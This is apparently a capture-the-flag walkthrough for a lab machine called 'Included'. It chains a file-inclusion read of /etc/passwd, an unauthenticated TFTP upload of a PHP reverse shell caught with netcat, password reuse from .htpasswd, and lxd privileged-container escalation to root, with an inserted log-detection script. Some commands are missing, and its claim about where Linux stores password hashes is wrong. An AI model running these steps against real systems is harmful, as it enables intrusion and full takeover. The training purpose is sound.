As usual, let's start with nmap:
nmap -sV -sC 10.129.166.191
Let's also do a UDP scan using:
sudo nmap -sU 10.129.166.191
Enter your password
UDP scans take a lot longer than the usual TCP scans, so be patient. Also, UDP scans require sudo.
Note that port 69/udp is open, which is associated with TFTP.
Port 80 is open, so let's check the website by going to : http://10.129.166.191
Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php
This looks like file inclusion, which explains the name of the machine, "Included".
Let's try it. Let's see if we can read /etc/passwd using http://10.129.166.191/?file=/etc/passwd
Using curl instead of the browser gives a cleaner view of the user entries.
What is the /etc/passwd file?
The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated ( : ) file.
Each line contains, in this order: user name, encrypted password, UID, GID, user home directory and login shell.
The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write to this file.
The encrypted passwords themselves are stored in the /etc/security/passwd file.
Earlier, the UDP scan showed that port 69/udp is open, which is associated with TFTP.
Let's install tftp first using:
sudo apt install tftp
Once installed, type:
By default, TFTP works without any authentication, meaning that anyone can upload files to and download files from the remote system!
Open a new command prompt window and type:
We are interested in php-reverse-shell.php. Let's make a copy of it first, called shell.php:
sudo cp php-reverse-shell.php shell.php
Let's now move shell.php to our home directory
sudo mv shell.php /home/htb-sneakymouse/
Your home directory will be different
Now open a new command prompt window and type:
We can see shell.php is now here in our home directory
Now let's edit this shell.php file using:
sudo nano shell.php
Scroll down until you see:
We need to change $ip to the IP of our VM.
If you don't know the IP of your VM, open a new command prompt window and type ifconfig.
We need to change $port to 4444 (because we will set up our netcat listener on port 4444).
When done, use:
Now that shell.php is ready, we need to upload it to the target using tftp. Go back to your tftp session and type:
Make sure you are in your home directory when running the command above, since that is where shell.php is.
Now that we have uploaded our file we can just quit:
Now let's open a new command prompt window and set up our netcat listener on port 4444
nc -lnvp 4444
Now go to the URL http://10.129.166.191/?file=/var/lib/tftpboot/shell.php
Nothing visibly happens, but this makes the target include and execute shell.php. Go back to your netcat window and you should have a connection:
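Seen from the web server's side, the whole chain above (reading /etc/passwd, then including a file dropped into the TFTP root) shows up in the access log as a `file=` parameter that is not one of the application's own pages. The following added detection script (example code, not part of this write-up) classifies such requests over constructed Apache-style log lines; the allow-list of legitimate pages and the log format are assumptions.

```python
# Added example, not from the write-up: flag requests whose ?file= parameter
# points outside the pages the application is meant to include.
import re
from urllib.parse import parse_qs, unquote, urlparse
from typing import List, Optional

# Constructed Apache-style access log lines (addresses and timestamps are made up).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=home.php HTTP/1.1" 200 1234
10.10.14.5 - - [01/Jan/2024:10:00:07 +0000] "GET /?file=/etc/passwd HTTP/1.1" 200 2048
10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2048
10.10.14.5 - - [01/Jan/2024:10:00:30 +0000] "GET /?file=/var/lib/tftpboot/shell.php HTTP/1.1" 200 0
10.10.14.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?file=contact.php HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
ALLOWED_PAGES = {"home.php", "contact.php"}  # assumed set of pages the app includes on purpose

def classify_file_param(value: str) -> Optional[str]:
    """Return a reason if the include target looks hostile, else None."""
    v = unquote(unquote(value))  # collapse single and double URL encoding
    if v.startswith("/var/lib/tftpboot/"):
        return "include from tftp root"  # world-writable via unauthenticated TFTP
    if v.startswith("/"):
        return "absolute path"
    if ".." in v.replace("\\", "/").split("/"):
        return "directory traversal"
    if "\x00" in v or "%00" in value:
        return "null byte"
    if v not in ALLOWED_PAGES:
        return "not in allow-list"
    return None

def scan_log(text: str) -> List[dict]:
    """Parse each request line and collect alerts for suspicious file= values."""
    alerts = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        src, ts, target, status = m.groups()
        for value in parse_qs(urlparse(target).query).get("file", []):
            reason = classify_file_param(value)
            if reason:
                alerts.append({"src": src, "time": ts, "file": value, "reason": reason, "status": int(status)})
    return alerts
```

The 200 status on the tftpboot request with a 0-byte response is exactly what the write-up describes ("nothing happens"), which is why the alert has to key on the parameter value rather than on the response.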
We got the shell! Let's upgrade the shell using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
We are www-data and are not allowed to read user.txt in mike's home directory.
Let's look for some credentials in:
.htpasswd is the file where the web server's authentication credentials for the website are stored.
We got the password! Maybe mike reuses the same password for his system account.
When prompted for the password, type:
We got in and we are now Mike
Congratulations! You got the user flag!
mike has not been granted sudo rights on the machine.
Let's google lxd and lxd privilege escalation. We find that lxd can be used to escalate privileges. With lxd, we can run system containers; a system container is like a full OS, almost like a VM.
From your VM, open a new command prompt window and follow the steps below:
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
--> this installs the Go programming language along with the other required packages
git clone https://github.com/lxc/distrobuilder
--> this downloads a copy of distrobuilder, which we need to create container images for lxd
--> distrobuilder has been built successfully!
Create a new directory called ContainerImages and a directory inside it called alpine using:
Let's also download the alpine.yaml file using:
Let's now build it:
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8
When done, you should have something like this:
We now have lxd.tar.xz and rootfs.squashfs
Let's start a web server on port 8000 on our VM using:
python3 -m http.server 8000
Now let's switch back to the shell on the target.
--> this retrieves rootfs.squashfs from the web server we just started on our VM and saves it on the target machine
--> this retrieves lxd.tar.xz from the web server we just started on our VM and saves it on the target machine
Now the files are on the target machine!
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
--> this imports the image under the alias alpine
lxc image list
--> this command confirms that the image has been imported properly
lxc init alpine privesc -c security.privileged=true
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
We got a shell! Not the prettiest shell, but it will do!
Congratulations! You got the root flag!